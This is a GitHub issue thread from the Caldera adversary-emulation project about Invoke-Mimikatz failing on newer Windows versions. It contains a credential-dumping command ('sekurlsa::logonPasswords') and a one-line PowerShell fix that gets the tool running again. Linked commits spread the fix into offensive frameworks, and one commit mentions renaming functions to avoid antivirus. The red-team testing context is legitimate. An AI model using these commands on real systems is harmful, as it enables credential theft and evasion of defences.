Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Error when Running Mimikatz #38

Closed
aktibista opened this issue May 25, 2018 · 7 comments
Closed

Error when Running Mimikatz #38

aktibista opened this issue May 25, 2018 · 7 comments

Comments

@aktibista
Copy link

aktibista commented May 25, 2018
edited
Loading

Hostname: win8
Command Line: powershell -command -
StdIn: [[powerkatz]] Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonPasswords exit"
StdOut:
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:6

  •     $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...

  •     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    • CategoryInfo : NotSpecified: (:) [], MethodInvocationException
    • FullyQualifiedErrorId : AmbiguousMatchException
@dm-mitre
Copy link
Contributor

This seems like a bug in PowerShell MimiKatz. We may need to upgrade the version.

@CG-root
Copy link

CG-root commented Jun 10, 2018

It seems that the issue starts from Windows 10 latest major update in April (Version 1803).

@CG-root
Copy link

CG-root commented Jun 10, 2018

I think I have solved it.

Change the following line:
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')

To

$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [reflection.bindingflags] "Public,Static", $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null);

Let me know if this solves the issue

@aktibista
Copy link
Author

I confirm that the solution works!

@unkempthenry unkempthenry mentioned this issue Jul 6, 2018
Closed
@unkempthenry
Copy link
Contributor

Unsure if the above script change only works on Windows 8.1 and not 10 (see #47 ). We should probably update Powersploit and mimiktaz across the board.

@wyncollier
Copy link

CG-Root is a God. I can verify that the fix works on line 886.

@unkempthenry
Copy link
Contributor

0b2c9e0 uses the latest version of Invoke-Mimikatz from Empire, I believe that this should solve this problem for new installs. Thanks everyone for digging into this!

pwndad added a commit to pwndad/PowerSploit that referenced this issue Aug 31, 2018
@pwndad
GetProcAddress has a new additional signature = ambiguous error
347edd3 
Cobalt got the same "ambiguous" powershell issue, since they use your code:
https://blog.cobaltstrike.com/2018/05/24/powershell-shellcode-injection-on-win-10-v1803/

However, this genious fix from @CG-root for Invoke-Mimikatz solves the issue for Invoke-Shellcode as well:
mitre/caldera#38 (comment)
@pwndad pwndad mentioned this issue Aug 31, 2018
Open
rtodora added a commit to rtodora/PowerSploit that referenced this issue Jan 28, 2019
@rtodora
Add files via upload
673bab9 
Changed to work on patched win10 systems, line 886 from previous, per this post: mitre/caldera#38
@joshbooks joshbooks mentioned this issue Feb 1, 2019
Open
@Cyb3rWard0g Cyb3rWard0g mentioned this issue Oct 16, 2019
Closed
brianedmonds90 pushed a commit that referenced this issue Jan 7, 2020
updating sandcat payloads for http (#38)
d2f28e4
gg-sec pushed a commit to gg-sec/update_invoke_mimikatz that referenced this issue Apr 6, 2020
@Snake230
Fix API issues (mitre/caldera#38 (comment))
30c4598
@NZLostboy NZLostboy mentioned this issue Aug 6, 2020
Open
breaktoprotect added a commit to breaktoprotect/stager that referenced this issue Oct 2, 2020
@breaktoprotect
Copied, modified, hash-smashed and saved
3e7ee5e 
Modified with mitre/caldera#38 CG-root's fix.
hkd3 added a commit to hkd3/Empire that referenced this issue Nov 13, 2020
@hkd3
Fixed issue when running on Win10 v1909
93561d6 
mitre/caldera#38
hkd3 added a commit to hkd3/PowerSploit that referenced this issue Nov 13, 2020
@hkd3
Fix issue when running with Win10 v1909
2d15ba2 
mitre/caldera#38
dutragustavo added a commit to dutragustavo/PowerSploit that referenced this issue Jan 11, 2021
@dutragustavo
Test patch to GetProcAddress
ca86b89 
mitre/caldera#38
armysick added a commit to armysick/Empire that referenced this issue Jan 12, 2021
@armysick
[FIX] mitre/caldera#38
403f902
@charnim charnim mentioned this issue Mar 31, 2021
Open
mp4383 pushed a commit to mp4383/Empire that referenced this issue Aug 6, 2021
@mpace4383
fixed via mitre/caldera/issues/38
a9a1866
ColeHouston added a commit to ColeHouston/PowerSploit that referenced this issue Jan 10, 2022
@ColeHouston
GetProcAddress fix and change function name
f7195f5 
Used the fix for the ambiguous GetProcAddress match as given here: mitre/caldera#38
Also changed the function name in case that helps in avoiding any red flags from AV
jlangdev added a commit to jlangdev/EDRDemoTools that referenced this issue Jan 12, 2022
@jlangdev
Create modefied Invoke Mimikatz
8448e34 
mitre/caldera#38 (comment)
gfctam added a commit to gfctam/PowerSploit that referenced this issue May 22, 2022
@gfctam
Fix-Mimikatz
59f7577 
mitre/caldera#38
@chunhualiu chunhualiu mentioned this issue Jan 4, 2024
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
5 participants
@aktibista @dm-mitre @CG-root @unkempthenry @wyncollier